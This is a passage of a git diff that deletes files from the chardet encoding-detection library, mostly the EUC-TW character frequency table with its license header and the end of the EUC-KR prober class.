St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCKRDistributionAnalysis -from mbcssm import EUCKRSMModel - -class EUCKRProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(EUCKRSMModel) - self._mDistributionAnalyzer = EUCKRDistributionAnalysis() - self.reset() - - def get_charset_name(self): - return "EUC-KR" diff --git a/chardet/chardet/euckrprober.pyc b/chardet/chardet/euckrprober.pyc deleted file mode 100644 index ba8b4ac..0000000 Binary files a/chardet/chardet/euckrprober.pyc and /dev/null differ diff --git a/chardet/chardet/euctwfreq.py b/chardet/chardet/euctwfreq.py deleted file mode 100644 index c057209..0000000 --- a/chardet/chardet/euctwfreq.py +++ /dev/null @@ -1,426 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -# EUCTW frequency table -# Converted from big5 work -# by Taiwan's Mandarin Promotion Council -# - -# 128 --> 0.42261 -# 256 --> 0.57851 -# 512 --> 0.74851 -# 1024 --> 0.89384 -# 2048 --> 0.97583 -# -# Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98 -# Random Distribution Ration = 512/(5401-512)=0.105 -# -# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR - -EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75 - -# Char to FreqOrder table , -EUCTW_TABLE_SIZE = 8102 - -EUCTWCharToFreqOrder = ( \ - 1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742 -3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758 -1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774 - 63,7312,7313, 317,1614, 75, 222, 159,4061,2412,1480,7314,3500,3068, 224,2809, # 2790 -3616, 3, 10,3870,1471, 29,2774,1135,2852,1939, 873, 130,3242,1123, 312,7315, # 2806 -4297,2051, 507, 252, 682,7316, 142,1914, 124, 206,2932, 34,3501,3173, 64, 604, # 2822 -7317,2494,1976,1977, 155,1990, 645, 641,1606,7318,3405, 337, 72, 406,7319, 80, # 2838 - 630, 238,3174,1509, 263, 939,1092,2644, 756,1440,1094,3406, 449, 69,2969, 591, # 2854 - 179,2095, 471, 115,2034,1843, 60, 50,2970, 134, 806,1868, 734,2035,3407, 180, # 2870 - 995,1607, 156, 537,2893, 688,7320, 319,1305, 779,2144, 514,2374, 298,4298, 359, # 2886 -2495, 90,2707,1338, 663, 11, 906,1099,2545, 20,2436, 182, 532,1716,7321, 732, # 2902 -1376,4062,1311,1420,3175, 25,2312,1056, 113, 399, 382,1949, 242,3408,2467, 529, # 2918 -3243, 475,1447,3617,7322, 117, 21, 656, 810,1297,2295,2329,3502,7323, 126,4063, # 2934 - 706, 456, 150, 613,4299, 71,1118,2036,4064, 145,3069, 85, 835, 486,2114,1246, # 2950 -1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,7324,2127,2354, 347,3736, 221, # 2966 -3503,3110,7325,1955,1153,4065, 83, 296,1199,3070, 192, 624, 93,7326, 822,1897, # 2982 -2810,3111, 795,2064, 991,1554,1542,1592, 27, 43,2853, 859, 139,1456, 860,4300, # 2998 - 437, 712,3871, 164,2392,3112, 695, 211,3017,2096, 195,3872,1608,3504,3505,3618, # 3014 -3873, 234, 811,2971,2097,3874,2229,1441,3506,1615,2375, 668,2076,1638, 305, 228, # 3030 -1664,4301, 467, 415,7327, 262,2098,1593, 239, 108, 300, 200,1033, 512,1247,2077, # 3046 -7328,7329,2173,3176,3619,2673, 593, 845,1062,3244, 88,1723,2037,3875,1950, 212, # 3062 - 266, 152, 149, 468,1898,4066,4302, 77, 187,7330,3018, 37, 5,2972,7331,3876, # 3078 -7332,7333, 39,2517,4303,2894,3177,2078, 55, 148, 74,4304, 545, 483,1474,1029, # 3094 -1665, 217,1869,1531,3113,1104,2645,4067, 24, 172,3507, 900,3877,3508,3509,4305, # 3110 - 32,1408,2811,1312, 329, 487,2355,2247,2708, 784,2674, 4,3019,3314,1427,1788, # 3126 - 188, 109, 499,7334,3620,1717,1789, 888,1217,3020,4306,7335,3510,7336,3315,1520, # 3142 -3621,3878, 196,1034, 775,7337,7338, 929,1815, 249, 439, 38,7339,1063,7340, 794, # 3158 -3879,1435,2296, 46, 178,3245,2065,7341,2376,7342, 214,1709,4307, 804, 35, 707, # 3174 - 324,3622,1601,2546, 140, 459,4068,7343,7344,1365, 839, 272, 978,2257,2572,3409, # 3190 -2128,1363,3623,1423, 697, 100,3071, 48, 70,1231, 495,3114,2193,7345,1294,7346, # 3206 -2079, 462, 586,1042,3246, 853, 256, 988, 185,2377,3410,1698, 434,1084,7347,3411, # 3222 - 314,2615,2775,4308,2330,2331, 569,2280, 637,1816,2518, 757,1162,1878,1616,3412, # 3238 - 287,1577,2115, 768,4309,1671,2854,3511,2519,1321,3737, 909,2413,7348,4069, 933, # 3254 -3738,7349,2052,2356,1222,4310, 765,2414,1322, 786,4311,7350,1919,1462,1677,2895, # 3270 -1699,7351,4312,1424,2437,3115,3624,2590,3316,1774,1940,3413,3880,4070, 309,1369, # 3286 -1130,2812, 364,2230,1653,1299,3881,3512,3882,3883,2646, 525,1085,3021, 902,2000, # 3302 -1475, 964,4313, 421,1844,1415,1057,2281, 940,1364,3116, 376,4314,4315,1381, 7, # 3318 -2520, 983,2378, 336,1710,2675,1845, 321,3414, 559,1131,3022,2742,1808,1132,1313, # 3334 - 265,1481,1857,7352, 352,1203,2813,3247, 167,1089, 420,2814, 776, 792,1724,3513, # 3350 -4071,2438,3248,7353,4072,7354, 446, 229, 333,2743, 901,3739,1200,1557,4316,2647, # 3366 -1920, 395,2744,2676,3740,4073,1835, 125, 916,3178,2616,4317,7355,7356,3741,7357, # 3382 -7358,7359,4318,3117,3625,1133,2547,1757,3415,1510,2313,1409,3514,7360,2145, 438, # 3398 -2591,2896,2379,3317,1068, 958,3023, 461, 311,2855,2677,4074,1915,3179,4075,1978, # 3414 - 383, 750,2745,2617,4076, 274, 539, 385,1278,1442,7361,1154,1964, 384, 561, 210, # 3430 - 98,1295,2548,3515,7362,1711,2415,1482,3416,3884,2897,1257, 129,7363,3742, 642, # 3446 - 523,2776,2777,2648,7364, 141,2231,1333, 68, 176, 441, 876, 907,4077, 603,2592, # 3462 - 710, 171,3417, 404, 549, 18,3118,2393,1410,3626,1666,7365,3516,4319,2898,4320, # 3478 -7366,2973, 368,7367, 146, 366, 99, 871,3627,1543, 748, 807,1586,1185, 22,2258, # 3494 - 379,3743,3180,7368,3181, 505,1941,2618,1991,1382,2314,7369, 380,2357, 218, 702, # 3510 -1817,1248,3418,3024,3517,3318,3249,7370,2974,3628, 930,3250,3744,7371, 59,7372, # 3526 - 585, 601,4078, 497,3419,1112,1314,4321,1801,7373,1223,1472,2174,7374, 749,1836, # 3542 - 690,1899,3745,1772,3885,1476, 429,1043,1790,2232,2116, 917,4079, 447,1086,1629, # 3558 -7375, 556,7376,7377,2020,1654, 844,1090, 105, 550, 966,1758,2815,1008,1782, 686, # 3574 -1095,7378,2282, 793,1602,7379,3518,2593,4322,4080,2933,2297,4323,3746, 980,2496, # 3590 - 544, 353, 527,4324, 908,2678,2899,7380, 381,2619,1942,1348,7381,1341,1252, 560, # 3606 -3072,7382,3420,2856,7383,2053, 973, 886,2080, 143,4325,7384,7385, 157,3886, 496, # 3622 -4081, 57, 840, 540,2038,4326,4327,3421,2117,1445, 970,2259,1748,1965,2081,4082, # 3638 -3119,1234,1775,3251,2816,3629, 773,1206,2129,1066,2039,1326,3887,1738,1725,4083, # 3654 - 279,3120, 51,1544,2594, 423,1578,2130,2066, 173,4328,1879,7386,7387,1583, 264, # 3670 - 610,3630,4329,2439, 280, 154,7388,7389,7390,1739, 338,1282,3073, 693,2857,1411, # 3686 -1074,3747,2440,7391,4330,7392,7393,1240, 952,2394,7394,2900,1538,2679, 685,1483, # 3702 -4084,2468,1436, 953,4085,2054,4331, 671,2395, 79,4086,2441,3252, 608, 567,2680, # 3718 -3422,4087,4088,1691, 393,1261,1791,2396,7395,4332,7396,7397,7398,7399,1383,1672, # 3734 -3748,3182,1464, 522,1119, 661,1150, 216, 675,4333,3888,1432,3519, 609,4334,2681, # 3750 -2397,7400,7401,7402,4089,3025, 0,7403,2469, 315, 231,2442, 301,3319,4335,2380, # 3766 -7404, 233,4090,3631,1818,4336,4337,7405, 96,1776,1315,2082,7406, 257,7407,1809, # 3782 -3632,2709,1139,1819,4091,2021,1124,2163,2778,1777,2649,7408,3074, 363,1655,3183, # 3798 -7409,2975,7410,7411,7412,3889,1567,3890, 718, 103,3184, 849,1443, 341,3320,2934, # 3814 -1484,7413,1712, 127, 67, 339,4092,2398, 679,1412, 821,7414,7415, 834, 738, 351, # 3830 -2976,2146, 846, 235,1497,1880, 418,1992,3749,2710, 186,1100,2147,2746,3520,1545, # 3846 -1355,2935,2858,1377, 583,3891,4093,2573,2977,7416,1298,3633,1078,2549,3634,2358, # 3862 - 78,3750,3751, 267,1289,2099,2001,1594,4094, 348, 369,1274,2194,2175,1837,4338, # 3878 -1820,2817,3635,2747,2283,2002,4339,2936,2748, 144,3321, 882,4340,3892,2749,3423, # 3894 -4341,2901,7417,4095,1726, 320,7418,3893,3026, 788,2978,7419,2818,1773,1327,2859, # 3910 -3894,2819,7420,1306,4342,2003,1700,3752,3521,2359,2650, 787,2022, 506, 824,3636, # 3926 - 534, 323,4343,1044,3322,2023,1900, 946,3424,7421,1778,1500,1678,7422,1881,4344, # 3942 - 165, 243,4345,3637,2521, 123, 683,4096, 764,4346, 36,3895,1792, 589,2902, 816, # 3958 - 626,1667,3027,2233,1639,1555,1622,3753,3896,7423,3897,2860,1370,1228,1932, 891, # 3974 -2083,2903, 304,4097,7424, 292,2979,2711,3522, 691,2100,4098,1115,4347, 118, 662, # 3990 -7425, 611,1156, 854,2381,1316,2861, 2, 386, 515,2904,7426,7427,3253, 868,2234, # 4006 -1486, 855,2651, 785,2212,3028,7428,1040,3185,3523,7429,3121, 448,7430,1525,7431, # 4022 -2164,4348,7432,3754,7433,4099,2820,3524,3122, 503, 818,3898,3123,1568, 814, 676, # 4038 -1444, 306,1749,7434,3755,1416,1030, 197,1428, 805,2821,1501,4349,7435,7436,7437, # 4054 -1993,7438,4350,7439,7440,2195, 13,2779,3638,2980,3124,1229,1916,7441,3756,2131, # 4070 -7442,4100,4351,2399,3525,7443,2213,1511,1727,1120,7444,7445, 646,3757,2443, 307, # 4086 -7446,7447,1595,3186,7448,7449,7450,3639,1113,1356,3899,1465,2522,2523,7451, 519, # 4102 -7452, 128,2132, 92,2284,1979,7453,3900,1512, 342,3125,2196,7454,2780,2214,1980, # 4118 -3323,7455, 290,1656,1317, 789, 827,2360,7456,3758,4352, 562, 581,3901,7457, 401, # 4134 -4353,2248, 94,4354,1399,2781,7458,1463,2024,4355,3187,1943,7459, 828,1105,4101, # 4150 -1262,1394,7460,4102, 605,4356,7461,1783,2862,7462,2822, 819,2101, 578,2197,2937, # 4166 -7463,1502, 436,3254,4103,3255,2823,3902,2905,3425,3426,7464,2712,2315,7465,7466, # 4182 -2332,2067, 23,4357, 193, 826,3759,2102, 699,1630,4104,3075, 390,1793,1064,3526, # 4198 -7467,1579,3076,3077,1400,7468,4105,1838,1640,2863,7469,4358,4359, 137,4106, 598, # 4214 -3078,1966, 780, 104, 974,2938,7470, 278, 899, 253, 402, 572, 504, 493,1339,7471, # 4230 -3903,1275,4360,2574,2550,7472,3640,3029,3079,2249, 565,1334,2713, 863, 41,7473, # 4246 -7474,4361,7475,1657,2333, 19, 463,2750,4107, 606,7476,2981,3256,1087,2084,1323, # 4262 -2652,2982,7477,1631,1623,1750,4108,2682,7478,2864, 791,2714,2653,2334, 232,2416, # 4278 -7479,2983,1498,7480,2654,2620, 755,1366,3641,3257,3126,2025,1609, 119,1917,3427, # 4294 - 862,1026,4109,7481,3904,3760,4362,3905,4363,2260,1951,2470,7482,1125, 817,4110, # 4310 -4111,3906,1513,1766,2040,1487,4112,3030,3258,2824,3761,3127,7483,7484,1507,7485, # 4326 -2683, 733, 40,1632,1106,2865, 345,4113, 841,2524, 230,4364,2984,1846,3259,3428, # 4342 -7486,1263, 986,3429,7487, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562,3907, # 4358 -3908,2939, 967,2751,2655,1349, 592,2133,1692,3324,2985,1994,4114,1679,3909,1901, # 4374 -2185,7488, 739,3642,2715,1296,1290,7489,4115,2198,2199,1921,1563,2595,2551,1870, # 4390 -2752,2986,7490, 435,7491, 343,1108, 596, 17,1751,4365,2235,3430,3643,7492,4366, # 4406 - 294,3527,2940,1693, 477, 979, 281,2041,3528, 643,2042,3644,2621,2782,2261,1031, # 4422 -2335,2134,2298,3529,4367, 367,1249,2552,7493,3530,7494,4368,1283,3325,2004, 240, # 4438 -1762,3326,4369,4370, 836,1069,3128, 474,7495,2148,2525, 268,3531,7496,3188,1521, # 4454 -1284,7497,1658,1546,4116,7498,3532,3533,7499,4117,3327,2684,1685,4118, 961,1673, # 4470 -2622, 190,2005,2200,3762,4371,4372,7500, 570,2497,3645,1490,7501,4373,2623,3260, # 4486 -1956,4374, 584,1514, 396,1045,1944,7502,4375,1967,2444,7503,7504,4376,3910, 619, # 4502 -7505,3129,3261, 215,2006,2783,2553,3189,4377,3190,4378, 763,4119,3763,4379,7506, # 4518 -7507,1957,1767,2941,3328,3646,1174, 452,1477,4380,3329,3130,7508,2825,1253,2382, # 4534 -2186,1091,2285,4120, 492,7509, 638,1169,1824,2135,1752,3911, 648, 926,1021,1324, # 4550 -4381, 520,4382, 997, 847,1007, 892,4383,3764,2262,1871,3647,7510,2400,1784,4384, # 4566 -1952,2942,3080,3191,1728,4121,2043,3648,4385,2007,1701,3131,1551, 30,2263,4122, # 4582 -7511,2026,4386,3534,7512, 501,7513,4123, 594,3431,2165,1821,3535,3432,3536,3192, # 4598 - 829,2826,4124,7514,1680,3132,1225,4125,7515,3262,4387,4126,3133,2336,7516,4388, # 4614 -4127,7517,3912,3913,7518,1847,2383,2596,3330,7519,4389, 374,3914, 652,4128,4129, # 4630 - 375,1140, 798,7520,7521,7522,2361,4390,2264, 546,1659, 138,3031,2445,4391,7523, # 4646 -2250, 612,1848, 910, 796,3765,1740,1371, 825,3766,3767,7524,2906,2554,7525, 692, # 4662 - 444,3032,2624, 801,4392,4130,7526,1491, 244,1053,3033,4131,4132, 340,7527,3915, # 4678 -1041,2987, 293,1168, 87,1357,7528,1539, 959,7529,2236, 721, 694,4133,3768, 219, # 4694 -1478, 644,1417,3331,2656,1413,1401,1335,1389,3916,7530,7531,2988,2362,3134,1825, # 4710 - 730,1515, 184,2827, 66,4393,7532,1660,2943, 246,3332, 378,1457, 226,3433, 975, # 4726 -3917,2944,1264,3537, 674, 696,7533, 163,7534,1141,2417,2166, 713,3538,3333,4394, # 4742 -3918,7535,7536,1186, 15,7537,1079,1070,7538,1522,3193,3539, 276,1050,2716, 758, # 4758 -1126, 653,2945,3263,7539,2337, 889,3540,3919,3081,2989, 903,1250,4395,3920,3434, # 4774 -3541,1342,1681,1718, 766,3264, 286, 89,2946,3649,7540,1713,7541,2597,3334,2990, # 4790 -7542,2947,2215,3194,2866,7543,4396,2498,2526, 181, 387,1075,3921, 731,2187,3335, # 4806 -7544,3265, 310, 313,3435,2299, 770,4134, 54,3034, 189,4397,3082,3769,3922,7545, # 4822 -1230,1617,1849, 355,3542,4135,4398,3336, 111,4136,3650,1350,3135,3436,3035,4137, # 4838 -2149,3266,3543,7546,2784,3923,3924,2991, 722,2008,7547,1071, 247,1207,2338,2471, # 4854 -1378,4399,2009, 864,1437,1214,4400, 373,3770,1142,2216, 667,4401, 442,2753,2555, # 4870 -3771,3925,1968,4138,3267,1839, 837, 170,1107, 934,1336,1882,7548,7549,2118,4139, # 4886 -2828, 743,1569,7550,4402,4140, 582,2384,1418,3437,7551,1802,7552, 357,1395,1729, # 4902 -3651,3268,2418,1564,2237,7553,3083,3772,1633,4403,1114,2085,4141,1532,7554, 482, # 4918 -2446,4404,7555,7556,1492, 833,1466,7557,2717,3544,1641,2829,7558,1526,1272,3652, # 4934 -4142,1686,1794, 416,2556,1902,1953,1803,7559,3773,2785,3774,1159,2316,7560,2867, # 4950 -4405,1610,1584,3036,2419,2754, 443,3269,1163,3136,7561,7562,3926,7563,4143,2499, # 4966 -3037,4406,3927,3137,2103,1647,3545,2010,1872,4144,7564,4145, 431,3438,7565, 250, # 4982 - 97, 81,4146,7566,1648,1850,1558, 160, 848,7567, 866, 740,1694,7568,2201,2830, # 4998 -3195,4147,4407,3653,1687, 950,2472, 426, 469,3196,3654,3655,3928,7569,7570,1188, # 5014 - 424,1995, 861,3546,4148,3775,2202,2685, 168,1235,3547,4149,7571,2086,1674,4408, # 5030 -3337,3270, 220,2557,1009,7572,3776, 670,2992, 332,1208, 717,7573,7574,3548,2447, # 5046 -3929,3338,7575, 513,7576,1209,2868,3339,3138,4409,1080,7577,7578,7579,7580,2527, # 5062 -3656,3549, 815,1587,3930,3931,7581,3550,3439,3777,1254,4410,1328,3038,1390,3932, # 5078 -1741,3933,3778,3934,7582, 236,3779,2448,3271,7583,7584,3657,3780,1273,3781,4411, # 5094 -7585, 308,7586,4412, 245,4413,1851,2473,1307,2575, 430, 715,2136,2449,7587, 270, # 5110 - 199,2869,3935,7588,3551,2718,1753, 761,1754, 725,1661,1840,4414,3440,3658,7589, # 5126 -7590, 587, 14,3272, 227,2598, 326, 480,2265, 943,2755,3552, 291, 650,1883,7591, # 5142 -1702,1226, 102,1547, 62,3441, 904,4415,3442,1164,4150,7592,7593,1224,1548,2756, # 5158 - 391, 498,1493,7594,1386,1419,7595,2055,1177,4416, 813, 880,1081,2363, 566,1145, # 5174 -4417,2286,1001,1035,2558,2599,2238, 394,1286,7596,7597,2068,7598, 86,1494,1730, # 5190 -3936, 491,1588, 745, 897,2948, 843,3340,3937,2757,2870,3273,1768, 998,2217,2069, # 5206 - 397,1826,1195,1969,3659,2993,3341, 284,7599,3782,2500,2137,2119,1903,7600,3938, # 5222 -2150,3939,4151,1036,3443,1904, 114,2559,4152, 209,1527,7601,7602,2949,2831,2625, # 5238 -2385,2719,3139, 812,2560,7603,3274,7604,1559, 737,1884,3660,1210, 885, 28,2686, # 5254 -3553,3783,7605,4153,1004,1779,4418,7606, 346,1981,2218,2687,4419,3784,1742, 797, # 5270 -1642,3940,1933,1072,1384,2151, 896,3941,3275,3661,3197,2871,3554,7607,2561,1958, # 5286 -4420,2450,1785,7608,7609,7610,3942,4154,1005,1308,3662,4155,2720,4421,4422,1528, # 5302 -2600, 161,1178,4156,1982, 987,4423,1101,4157, 631,3943,1157,3198,2420,1343,1241, # 5318 -1016,2239,2562, 372, 877,2339,2501,1160, 555,1934, 911,3944,7611, 466,1170, 169, # 5334 -1051,2907,2688,3663,2474,2994,1182,2011,2563,1251,2626,7612, 992,2340,3444,1540, # 5350 -2721,1201,2070,2401,1996,2475,7613,4424, 528,1922,2188,1503,1873,1570,2364,3342, # 5366 -3276,7614, 557,1073,7615,1827,3445,2087,2266,3140,3039,3084, 767,3085,2786,4425, # 5382 -1006,4158,4426,2341,1267,2176,3664,3199, 778,3945,3200,2722,1597,2657,7616,4427, # 5398 -7617,3446,7618,7619,7620,3277,2689,1433,3278, 131, 95,1504,3946, 723,4159,3141, # 5414 -1841,3555,2758,2189,3947,2027,2104,3665,7621,2995,3948,1218,7622,3343,3201,3949, # 5430 -4160,2576, 248,1634,3785, 912,7623,2832,3666,3040,3786, 654, 53,7624,2996,7625, # 5446 -1688,4428, 777,3447,1032,3950,1425,7626, 191, 820,2120,2833, 971,4429, 931,3202, # 5462 - 135, 664, 783,3787,1997, 772,2908,1935,3951,3788,4430,2909,3203, 282,2723, 640, # 5478 -1372,3448,1127, 922, 325,3344,7627,7628, 711,2044,7629,7630,3952,2219,2787,1936, # 5494 -3953,3345,2220,2251,3789,2300,7631,4431,3790,1258,3279,3954,3204,2138,2950,3955, # 5510 -3956,7632,2221, 258,3205,4432, 101,1227,7633,3280,1755,7634,1391,3281,7635,2910, # 5526 -2056, 893,7636,7637,7638,1402,4161,2342,7639,7640,3206,3556,7641,7642, 878,1325, # 5542 -1780,2788,4433, 259,1385,2577, 744,1183,2267,4434,7643,3957,2502,7644, 684,1024, # 5558 -4162,7645, 472,3557,3449,1165,3282,3958,3959, 322,2152, 881, 455,1695,1152,1340, # 5574 - 660, 554,2153,4435,1058,4436,4163, 830,1065,3346,3960,4437,1923,7646,1703,1918, # 5590 -7647, 932,2268, 122,7648,4438, 947, 677,7649,3791,2627, 297,1905,1924,2269,4439, # 5606 -2317,3283,7650,7651,4164,7652,4165, 84,4166, 112, 989,7653, 547,1059,3961, 701, # 5622 -3558,1019,7654,4167,7655,3450, 942, 639, 457,2301,2451, 993,2951, 407, 851, 494, # 5638 -4440,3347, 927,7656,1237,7657,2421,3348, 573,4168, 680, 921,2911,1279,1874, 285, # 5654 - 790,1448,1983, 719,2167,7658,7659,4441,3962,3963,1649,7660,1541, 563,7661,1077, # 5670 -7662,3349,3041,3451, 511,2997,3964,3965,3667,3966,1268,2564,3350,3207,4442,4443, # 5686 -7663, 535,1048,1276,1189,2912,2028,3142,1438,1373,2834,2952,1134,2012,7664,4169, # 5702 -1238,2578,3086,1259,7665, 700,7666,2953,3143,3668,4170,7667,4171,1146,1875,1906, # 5718 -4444,2601,3967, 781,2422, 132,1589, 203, 147, 273,2789,2402, 898,1786,2154,3968, # 5734 -3969,7668,3792,2790,7669,7670,4445,4446,7671,3208,7672,1635,3793, 965,7673,1804, # 5750 -2690,1516,3559,1121,1082,1329,3284,3970,1449,3794, 65,1128,2835,2913,2759,1590, # 5766 -3795,7674,7675, 12,2658, 45, 976,2579,3144,4447, 517,2528,1013,1037,3209,7676, # 5782 -3796,2836,7677,3797,7678,3452,7679,2602, 614,1998,2318,3798,3087,2724,2628,7680, # 5798 -2580,4172, 599,1269,7681,1810,3669,7682,2691,3088, 759,1060, 489,1805,3351,3285, # 5814 -1358,7683,7684,2386,1387,1215,2629,2252, 490,7685,7686,4173,1759,2387,2343,7687, # 5830 -4448,3799,1907,3971,2630,1806,3210,4449,3453,3286,2760,2344, 874,7688,7689,3454, # 5846 -3670,1858, 91,2914,3671,3042,3800,4450,7690,3145,3972,2659,7691,3455,1202,1403, # 5862 -3801,2954,2529,1517,2503,4451,3456,2504,7692,4452,7693,2692,1885,1495,1731,3973, # 5878 -2365,4453,7694,2029,7695,7696,3974,2693,1216, 237,2581,4174,2319,3975,3802,4454, # 5894 -4455,2694,3560,3457, 445,4456,7697,7698,7699,7700,2761, 61,3976,3672,1822,3977, # 5910 -7701, 687,2045, 935, 925, 405,2660, 703,1096,1859,2725,4457,3978,1876,1367,2695, # 5926 -3352, 918,2105,1781,2476, 334,3287,1611,1093,4458, 564,3146,3458,3673,3353, 945, # 5942 -2631,2057,4459,7702,1925, 872,4175,7703,3459,2696,3089, 349,4176,3674,3979,4460, # 5958 -3803,4177,3675,2155,3980,4461,4462,4178,4463,2403,2046, 782,3981, 400, 251,4179, # 5974 -1624,7704,7705, 277,3676, 299,1265, 476,1191,3804,2121,4180,4181,1109, 205,7706, # 5990 -2582,1000,2156,3561,1860,7707,7708,7709,4464,7710,4465,2565, 107,2477,2157,3982, # 6006 -3460,3147,7711,1533, 541,1301, 158, 753,4182,2872,3562,7712,1696, 370,1088,4183, # 6022 -4466,3563, 579, 327, 440, 162,2240, 269,1937,1374,3461, 968,3043, 56,1396,3090, # 6038 -2106,3288,3354,7713,1926,2158,4467,2998,7714,3564,7715,7716,3677,4468,2478,7717, # 6054 -2791,7718,1650,4469,7719,2603,7720,7721,3983,2661,3355,1149,3356,3984,3805,3985, # 6070 -7722,1076, 49,7723, 951,3211,3289,3290, 450,2837, 920,7724,1811,2792,2366,4184, # 6086 -1908,1138,2367,3806,3462,7725,3212,4470,1909,1147,1518,2423,4471,3807,7726,4472, # 6102 -2388,2604, 260,1795,3213,7727,7728,3808,3291, 708,7729,3565,1704,7730,3566,1351, # 6118 -1618,3357,2999,1886, 944,4185,3358,4186,3044,3359,4187,7731,3678, 422, 413,1714, # 6134 -3292, 500,2058,2345,4188,2479,7732,1344,1910, 954,7733,1668,7734,7735,3986,2404, # 6150 -4189,3567,3809,4190,7736,2302,1318,2505,3091, 133,3092,2873,4473, 629, 31,2838, # 6166 -2697,3810,4474, 850, 949,4475,3987,2955,1732,2088,4191,1496,1852,7737,3988, 620, # 6182 -3214, 981,1242,3679,3360,1619,3680,1643,3293,2139,2452,1970,1719,3463,2168,7738, # 6198 -3215,7739,7740,3361,1828,7741,1277,4476,1565,2047,7742,1636,3568,3093,7743, 869, # 6214 -2839, 655,3811,3812,3094,3989,3000,3813,1310,3569,4477,7744,7745,7746,1733, 558, # 6230 -4478,3681, 335,1549,3045,1756,4192,3682,1945,3464,1829,1291,1192, 470,2726,2107, # 6246 -2793, 913,1054,3990,7747,1027,7748,3046,3991,4479, 982,2662,3362,3148,3465,3216, # 6262 -3217,1946,2794,7749, 571,4480,7750,1830,7751,3570,2583,1523,2424,7752,2089, 984, # 6278 -4481,3683,1959,7753,3684, 852, 923,2795,3466,3685, 969,1519, 999,2048,2320,1705, # 6294 -7754,3095, 615,1662, 151, 597,3992,2405,2321,1049, 275,4482,3686,4193, 568,3687, # 6310 -3571,2480,4194,3688,7755,2425,2270, 409,3218,7756,1566,2874,3467,1002, 769,2840, # 6326 - 194,2090,3149,3689,2222,3294,4195, 628,1505,7757,7758,1763,2177,3001,3993, 521, # 6342 -1161,2584,1787,2203,2406,4483,3994,1625,4196,4197, 412, 42,3096, 464,7759,2632, # 6358 -4484,3363,1760,1571,2875,3468,2530,1219,2204,3814,2633,2140,2368,4485,4486,3295, # 6374 -1651,3364,3572,7760,7761,3573,2481,3469,7762,3690,7763,7764,2271,2091, 460,7765, # 6390 -4487,7766,3002, 962, 588,3574, 289,3219,2634,1116, 52,7767,3047,1796,7768,7769, # 6406 -7770,1467,7771,1598,1143,3691,4198,1984,1734,1067,4488,1280,3365, 465,4489,1572, # 6422 - 510,7772,1927,2241,1812,1644,3575,7773,4490,3692,7774,7775,2663,1573,1534,7776, # 6438 -7777,4199, 536,1807,1761,3470,3815,3150,2635,7778,7779,7780,4491,3471,2915,1911, # 6454 -2796,7781,3296,1122, 377,3220,7782, 360,7783,7784,4200,1529, 551,7785,2059,3693, # 6470 -1769,2426,7786,2916,4201,3297,3097,2322,2108,2030,4492,1404, 136,1468,1479, 672, # 6486 -1171,3221,2303, 271,3151,7787,2762,7788,2049, 678,2727, 865,1947,4493,7789,2013, # 6502 -3995,2956,7790,2728,2223,1397,3048,3694,4494,4495,1735,2917,3366,3576,7791,3816, # 6518 - 509,2841,2453,2876,3817,7792,7793,3152,3153,4496,4202,2531,4497,2304,1166,1010, # 6534 - 552, 681,1887,7794,7795,2957,2958,3996,1287,1596,1861,3154, 358, 453, 736, 175, # 6550 - 478,1117, 905,1167,1097,7796,1853,1530,7797,1706,7798,2178,3472,2287,3695,3473, # 6566 -3577,4203,2092,4204,7799,3367,1193,2482,4205,1458,2190,2205,1862,1888,1421,3298, # 6582 -2918,3049,2179,3474, 595,2122,7800,3997,7801,7802,4206,1707,2636, 223,3696,1359, # 6598 - 751,3098, 183,3475,7803,2797,3003, 419,2369, 633, 704,3818,2389, 241,7804,7805, # 6614 -7806, 838,3004,3697,2272,2763,2454,3819,1938,2050,3998,1309,3099,2242,1181,7807, # 6630 -1136,2206,3820,2370,1446,4207,2305,4498,7808,7809,4208,1055,2605, 484,3698,7810, # 6646 -3999, 625,4209,2273,3368,1499,4210,4000,7811,4001,4211,3222,2274,2275,3476,7812, # 6662 -7813,2764, 808,2606,3699,3369,4002,4212,3100,2532, 526,3370,3821,4213, 955,7814, # 6678 -1620,4214,2637,2427,7815,1429,3700,1669,1831, 994, 928,7816,3578,1260,7817,7818, # 6694 -7819,1948,2288, 741,2919,1626,4215,2729,2455, 867,1184, 362,3371,1392,7820,7821, # 6710 -4003,4216,1770,1736,3223,2920,4499,4500,1928,2698,1459,1158,7822,3050,3372,2877, # 6726 -1292,1929,2506,2842,3701,1985,1187,2071,2014,2607,4217,7823,2566,2507,2169,3702, # 6742 -2483,3299,7824,3703,4501,7825,7826, 666,1003,3005,1022,3579,4218,7827,4502,1813, # 6758 -2253, 574,3822,1603, 295,1535, 705,3823,4219, 283, 858, 417,7828,7829,3224,4503, # 6774 -4504,3051,1220,1889,1046,2276,2456,4004,1393,1599, 689,2567, 388,4220,7830,2484, # 6790 - 802,7831,2798,3824,2060,1405,2254,7832,4505,3825,2109,1052,1345,3225,1585,7833, # 6806 - 809,7834,7835,7836, 575,2730,3477, 